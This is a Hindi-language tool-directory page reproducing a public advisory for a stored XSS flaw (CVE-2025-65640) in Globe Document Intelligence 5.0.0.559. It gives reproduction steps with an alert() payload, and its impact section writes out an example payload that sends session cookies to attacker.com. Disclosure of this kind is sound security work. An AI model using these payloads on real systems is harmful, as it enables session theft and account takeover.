Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-65640 — CVE-2025-65640 के लिए सार्वजनिक सलाह: Globe Document Intelligence में संग्रहीत XSS भेद्यता। | Kitploit
उपकरण/GitHubGitHub/vincenzo-emanuele/cve-2025-65640
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubvincenzo-emanuele/cve-2025-65640

CVE-2025-65640

CVE-2025-65640 के लिए सार्वजनिक सलाह: Globe Document Intelligence में संग्रहीत XSS भेद्यता।

रिपॉजिटरी देखें
1013 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-65640

1. भेद्यता जानकारी

  • CVE ID: CVE-2025-65640 (वर्तमान में आरक्षित)
  • भेद्यता प्रकार: संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
  • CVSSv3 score: 6.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N)
  • विक्रेता: Arket/Bluenext S.r.l.
  • उत्पाद: Globe Document Intelligence
  • प्रभावित संस्करण: 5.0.0.559
  • खोजकर्ता: Vincenzo Emanuele Martone

2. विवरण

ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म (संस्करण 5.0.0.559) में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता की पहचान की गई। एप्लिकेशन नवनिर्मित दस्तावेज़ के "शीर्षक" गुण के भीतर उपयोगकर्ता द्वारा प्रदान किए गए इनपुट को ठीक से स्वच्छ या एन्कोड करने में विफल रहता है। जब कोई प्रमाणित उपयोगकर्ता सारांश पृष्ठों (जैसे, "कार्य प्रगति पर / हाल ही") पर जाता है, तो दुर्भावनापूर्ण पेलोड पीड़ित के ब्राउज़र के संदर्भ में परावर्तित और निष्पादित होता है।

3. प्रभाव

यह भेद्यता एक प्रमाणित हमलावर को सर्वर पर दुर्भावनापूर्ण जावास्क्रिप्ट कोड संग्रहीत करने की अनुमति देती है। जब अन्य प्रमाणित उपयोगकर्ता (प्रशासनिक खातों सहित) प्रभावित पृष्ठों को देखते हैं, तो स्क्रिप्ट स्वचालित रूप से निष्पादित होती है। जबकि नीचे दिया गया प्रूफ ऑफ कॉन्सेप्ट एक सौम्य alert() का उपयोग करके भेद्यता प्रदर्शित करता है, एक हमलावर इस दोष को सत्र अपहरण और खाता अधिग्रहण प्राप्त करने के लिए हथियार बना सकता है। उदाहरण के लिए, <script>fetch('https://attacker.com/?cookie='+encodeURIComponent(document.cookie))</script> जैसे पेलोड को इंजेक्ट करने से पीड़ित के सत्र कुकीज़ हमलावर द्वारा नियंत्रित बाहरी सर्वर पर चुपचाप बाहर निकल जाएंगी।

4. पुनरुत्पादन के चरण (प्रूफ ऑफ कॉन्सेप्ट)

भेद्यता को पुन: उत्पन्न करने के लिए, एक प्रमाणित हमलावर इन चरणों का पालन कर सकता है:

  1. दस्तावेज़ निर्माण अनुभाग ("Nuovo documento") पर जाएं और सफलतापूर्वक एक नया दस्तावेज़ बनाने के लिए आवश्यक फ़ील्ड को मनमाने डेटा से भरें।
  2. फ़ॉर्म सबमिट करें और दस्तावेज़ बनाएं।
  3. नवनिर्मित दस्तावेज़ चुनें, संदर्भ मेनू (राइट-क्लिक -> दस्तावेज़ गुण) खोलें, और "शीर्षक" फ़ील्ड का पता लगाएं।
  4. "शीर्षक" फ़ील्ड में निम्नलिखित बुनियादी XSS पेलोड इंजेक्ट करें: <script>alert("XSS")</script>
  5. परिवर्तन सहेजें। दुर्भावनापूर्ण पेलोड अब डेटाबेस में स्थायी रूप से संग्रहीत हो गया है।
  6. "कार्य प्रगति पर / हाल ही" (Task in attesa/Recenti) पृष्ठ पर जाएं।
  7. जैसे ही पृष्ठ उचित आउटपुट एन्कोडिंग के बिना दस्तावेज़ शीर्षक प्रस्तुत करता है, जावास्क्रिप्ट पेलोड निष्पादित होता है, जिससे अलर्ट ट्रिगर होता है।

5. अनुशंसित शमन

विक्रेता के अनुसार, यह भेद्यता संस्करण 5.1.0.575 में संबोधित की गई है। इस समस्या को ठीक करने के लिए, ग्लोब डॉक्यूमेंट इंटेलिजेंस प्लेटफॉर्म को संस्करण 5.1.0.575 में अपडेट करने की अनुशंसा की जाती है।


अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट (PoC) विशेष रूप से शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस दस्तावेज़ में विस्तृत जानकारी और कोड का उपयोग दुर्भावनापूर्ण गतिविधियों या सिस्टम स्वामियों से स्पष्ट, पूर्व अनुमति के बिना किसी भी सिस्टम के विरुद्ध नहीं किया जाना चाहिए। लेखक किसी भी दायित्व को नहीं मानता है और प्रदान की गई सामग्री के अनुप्रयोग से होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें